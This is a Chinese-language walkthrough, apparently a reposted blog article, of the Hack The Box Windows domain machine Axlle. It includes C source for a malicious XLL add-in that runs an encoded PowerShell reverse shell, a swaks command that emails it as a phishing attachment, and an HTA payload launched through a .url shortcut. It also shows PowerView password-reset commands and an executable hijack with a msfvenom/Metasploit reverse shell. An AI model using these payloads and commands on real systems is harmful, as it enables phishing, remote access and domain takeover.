前言
今天的靶机依然是HTB(Hack The Box)的靶机--Axlle。通过这次的靶机训练,我们可以继续了解邮件钓鱼的攻击方式,也可以继续熟悉域渗透工具BloodHound的使用。
选择HTB的Axlle靶机,下载HTB的VPN。
-
Kali
将HTB的vpn文件put到kali中,使用命令 openvpn + ovpn文件路径 命令开启vpn连接。连接成功会在HTB网页右上角显示CONNECTIONS
2、扫描开放端口
3、寻找漏洞尝试利用
尝试smb匿名访问、ldapsearch匿名搜索:
因为开放了smtp服务,接下来尝试smtp用户枚举:
smtp用户枚举并没有什么发现,接下来将域名解析记录添加至/etc/hosts,尝试子域名扫描:
尝试路径爆破:
都没有什么发现后,只能回头看看80页面有没有什么功能,或者有什么遗漏的信息
https://unit42.paloaltonetworks.com/excel-add-ins-malicious-xll-files-agent-tesla/
下面就是构造一个xll文件,去执行shellcode。
https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#xll-exec
先在kali中安装依赖:
生成反弹shell的shellcode(最终尝试用powershell版本成功):
结合之前博客给出的示例,编写expliot.c:
__declspec(dllexport) void __cdecl xlAutoOpen(void);void __cdecl xlAutoOpen() {WinExec("powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQAxACIALAA3ADcANwA3ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==", 1);}BOOL APIENTRY DllMain(HMODULE hModule,DWORD ul_reason_for_call,LPVOID lpReserved){switch (ul_reason_for_call){case DLL_PROCESS_ATTACH:case DLL_THREAD_ATTACH:case DLL_THREAD_DETACH:case DLL_PROCESS_DETACH:break;}return TRUE;}
将expliot.c编译为reverse.xll,命令如下:
x86_64-w64-mingw32-gcc -fPIC -shared -o reverse.xll exploit.c -luser32
通过 swaks 命令,将生成的reverse.xll 以附件形式发送邮件 到 accounts@axlle.htb
swaks --to accounts@axlle.htb --from it@axlle.htb --server 10.129.xxx.xxx --port 25 --header "Subject: reverse" --body "check" --attach @reverse.xll
kali先nc开启端口监听,待swaks发送邮件后就能拿到gideon.hamill用户的shell
访问 Dataaxlle.htbdallonmatrix2F 目录,发现一个邮件文件:
创建名为 rev.url 的快捷方式并指向 file://10.10.xx.xx/share/shell.htb,我们将会在 10.10.xx.xx(kali内网ip) 上起一个 smb 服务,用于共享我们的 shell.hta 文件。
若没windows环境,也可以在kali创建快捷方式文件rev.url,内容为:
[{000214A0-0000-0000-C000-000000000046}]Prop3=19,9[InternetShortcut]URL=file://10.10.xx.xx/share/shell.hta
<html><head><script language="JScript">var shell = new ActiveXObject("WScript.Shell");var res = shell.Run("powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQAxACIALAA2ADYANgA2ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==");</script></head><body><script language="JScript">self.close();</script></body></html>
将创建的 rev.url 快捷方式文件、shell.hta 文件 放到同一目录下
kali在 shell.hta 所在的目录开启 smb 服务:
impacket-smbserver -smb2support share .
、
在rev.url所在目录开启http服务:
靶机进入 C:inetpubtesting 目录 wget下载快捷方式文件 rev.url
在靶机下载快捷方式文件 rev.url 前,先 nc 开启端口监听,待 C:inetpubtesting 目录下载rev.url 后就能成功拿到 dallon.matrix 用户的 shell
读取桌面目录(C:Usersdallon.matrix/Desktop)下用户flag:
4、提权
上传 SharpHound 进行域内信息收集:
kali开启smb服务,将sharphound的结果上传到kali:
查看bloodhound的结果:
可以发现 web [email protected] 组 对用户 JACOB.GREENY 和 BAZ.HUMPHRIES 有 ForceChangePassword权限,可以修改用户 JACOB.GREENY 和 BAZ.HUMPHRIES 的密码
而当前获取的用户 dallon.matrix 在 WEB DEVS 组中
下载 PowerView.ps1 修改用户 JACOB.GREENY 和 BAZ.HUMPHRIES 的密码,接下来修改 JACOB.GREENY用户的密码
命令如下:
. ./PowerView.ps1$pass = ConvertTo-SecureString 'Say!d12Lq3#56' -AsPlainText -ForceSet-DomainUserPassword -Identity Jacob.Greeny -AccountPassword $pass
evil-winrm登录JACOB.GREENY
在 JACOB.GREENY 这个用户中,App Developmentkbfiltr 目录下 有个README.md 文件
读取README.md
其中说到,会自动以SYSTEM身份运行 C:Program Files (x86)Windows Kits10TestingStandaloneTestingInternalx64standalonerunner.exe
这疑似是个自动执行的任务,并且 standalonerunner.exe 是以 System 身份运行的。
进入目录
C:Program Files (x86)Windows Kits10TestingStandaloneTestingInternalx64
发现 standalonerunner.exe 可执行文件
icacls 查看文件的访问控制列表(ACLS)
I、表示 "继承"
R、表示 "读取" 权限(Read)
F:表示 "完全控制" 权限(Full control)
RX:表示 "读取和执行" 权限(Read and eXecute)
可以发现这个 exe 文件有完全控制权限
接下来就是 替换这个 exe(exe劫持),拿到管理员shell
msfvenom 生成反弹 shell 的exe文件,重命名为 standalonerunner.exe
利用msfconsole 开启端口监听
msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter_reverse_tcp; set lhost 10.10.14.11; set lport 443; exploit"
靶机下载 msfvenom 生成的 standalonerunner.exe
成功获取 管理员 shell
读取 root flag
5、总结
这个靶机先是利用xll钓鱼获取gideon.hamill用户的shell,然后通过快捷方式钓鱼获取dallon.matrix 用户的shell,提权部分则是利用BloodHound进行域内信息收集,发现可以修改JACOB.GREENY 这个用户的密码,然后通过exe劫持拿到管理员权限。总体来说还是有些难度的,同时也挺有趣的。
原文始发于微信公众号(从黑客到保安):跟着大佬学渗透之高级篇07
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论